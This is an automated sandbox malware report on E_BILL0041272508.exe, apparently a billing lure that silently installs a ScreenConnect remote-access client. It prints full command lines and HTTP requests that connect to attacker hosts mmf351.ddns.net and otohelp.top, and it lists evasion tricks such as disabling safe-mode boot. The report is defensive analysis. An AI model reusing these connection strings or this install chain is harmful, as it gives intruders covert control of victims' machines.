Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
E_BILL0041272508.exe

Overview

General Information

Sample name:E_BILL0041272508.exe
Analysis ID:1523876
MD5:9ffc98a16aba4841e94b24ccabf219ab
SHA1:31925b39e3255446a3b0803da2f75337329f6a65
SHA256:453e8d5897ce07b29bc8df2312686cca8d2df37bcf43b1e7e0d5c8b0ee585a3f
Tags:exefiledn-comuser-JAMESWT_MHT
Infos:

Detection

ScreenConnect Tool
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:20
Range:0 - 100

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
.NET source code references suspicious native API functions
Contains functionality to hide user accounts
Deletes keys which are related to windows safe boot (disables safe mode boot)
Enables network access during safeboot for specific services
Initial sample is a PE file and has a suspicious name
Reads the Security eventlog
Reads the System eventlog
Uses dynamic DNS services
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • E_BILL0041272508.exe (PID: 3568 cmdline: "C:\Users\user\Desktop\E_BILL0041272508.exe" MD5: 9FFC98A16ABA4841E94B24CCABF219AB)
    • dfsvc.exe (PID: 6456 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 6552 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe" MD5: 20AB8141D958A58AADE5E78671A719BF)
        • ScreenConnect.ClientService.exe (PID: 1340 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
  • svchost.exe (PID: 3524 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 1672 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 2736 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe" "RunRole" "83265b87-0d31-430d-be3a-51c1a25f31d5" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      SourceRuleDescriptionAuthorStrings
      00000006.00000000.2369506289.00000000001E2000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        00000002.00000002.4002929791.0000023CE6080000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          00000002.00000002.3991111838.0000023CCC49A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            Process Memory Space: dfsvc.exe PID: 6456JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              Process Memory Space: ScreenConnect.WindowsClient.exe PID: 6552JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                Click to see the 1 entries
                SourceRuleDescriptionAuthorStrings
                6.0.ScreenConnect.WindowsClient.exe.1e0000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

                  System Summary

                  barindex
                  Source: Network ConnectionAuthor: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.6, DestinationIsIpv6: false, DestinationPort: 49714, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 6456, Protocol: tcp, SourceIp: 79.110.49.16, SourceIsIpv6: false, SourcePort: 443
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3524, ProcessName: svchost.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-02T06:25:23.034206+020020098971A Network Trojan was detected79.110.49.16443192.168.2.649723TCP
                  2024-10-02T06:25:24.139539+020020098971A Network Trojan was detected79.110.49.16443192.168.2.649725TCP
                  2024-10-02T06:25:27.919859+020020098971A Network Trojan was detected79.110.49.16443192.168.2.649730TCP
                  2024-10-02T06:25:29.012255+020020098971A Network Trojan was detected79.110.49.16443192.168.2.649731TCP
                  2024-10-02T06:25:30.764881+020020098971A Network Trojan was detected79.110.49.16443192.168.2.649734TCP
                  2024-10-02T06:25:31.855577+020020098971A Network Trojan was detected79.110.49.16443192.168.2.649736TCP
                  2024-10-02T06:25:34.080744+020020098971A Network Trojan was detected79.110.49.16443192.168.2.649737TCP
                  2024-10-02T06:25:35.668872+020020098971A Network Trojan was detected79.110.49.16443192.168.2.649738TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: E_BILL0041272508.exeReversingLabs: Detection: 18%
                  Source: E_BILL0041272508.exeVirustotal: Detection: 13%Perma Link
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeCode function: 0_2_009B1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_009B1000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to behavior

                  Compliance

                  barindex
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeUnpacked PE file: 7.2.ScreenConnect.ClientService.exe.5020000.1.unpack
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Source: E_BILL0041272508.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: E_BILL0041272508.exeStatic PE information: certificate valid
                  Source: unknownHTTPS traffic detected: 79.110.49.16:443 -> 192.168.2.6:49714 version: TLS 1.2
                  Source: E_BILL0041272508.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6E5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC367000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2385098018.00000000021E2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: E_BILL0041272508.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6E1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC363000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.2382809510.0000000002B12000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2435126842.0000000002241000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2435049004.00000000020E0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr, ScreenConnect.ClientService.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000006.00000000.2369506289.00000000001E2000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.2378580945.000000000002D000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC35F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6DD000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2387012518.000000001B472000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000006.00000000.2369506289.00000000001E2000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC35F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6DD000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2387012518.000000001B472000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6E5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC367000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2385098018.00000000021E2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6D5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC47C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.2383094950.0000000005022000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Core.dll0.2.dr, ScreenConnect.Core.dll.2.dr
                  Source: C:\Users\user\Desktop\E_BILL0041272508.exeCode function: 0_2_009B4A4B FindFirstFileExA,0_2_009B4A4B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.16:443 -> 192.168.2.6:49731
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.16:443 -> 192.168.2.6:49734
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.16:443 -> 192.168.2.6:49723
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.16:443 -> 192.168.2.6:49725
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.16:443 -> 192.168.2.6:49730
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.16:443 -> 192.168.2.6:49736
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.16:443 -> 192.168.2.6:49738
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.16:443 -> 192.168.2.6:49737
                  Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exeRegistry value created: NULL ServiceJump to behavior
                  Source: unknownDNS query: name: mmf351.ddns.net
                  Source: global trafficTCP traffic: 192.168.2.6:49740 -> 79.110.49.16:8041
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session HTTP/1.1Host: otohelp.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
                  Source: Joe Sandbox ViewIP Address: 79.110.49.16 79.110.49.16
                  Source: Joe Sandbox ViewASN Name: OTAVANET-ASCZ OTAVANET-ASCZ
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session HTTP/1.1Host: otohelp.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
                  Source: global trafficDNS traffic detected: DNS query: otohelp.top
                  Source: global trafficDNS traffic detected: DNS query: mmf351.ddns.net
                  Source: E_BILL0041272508.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
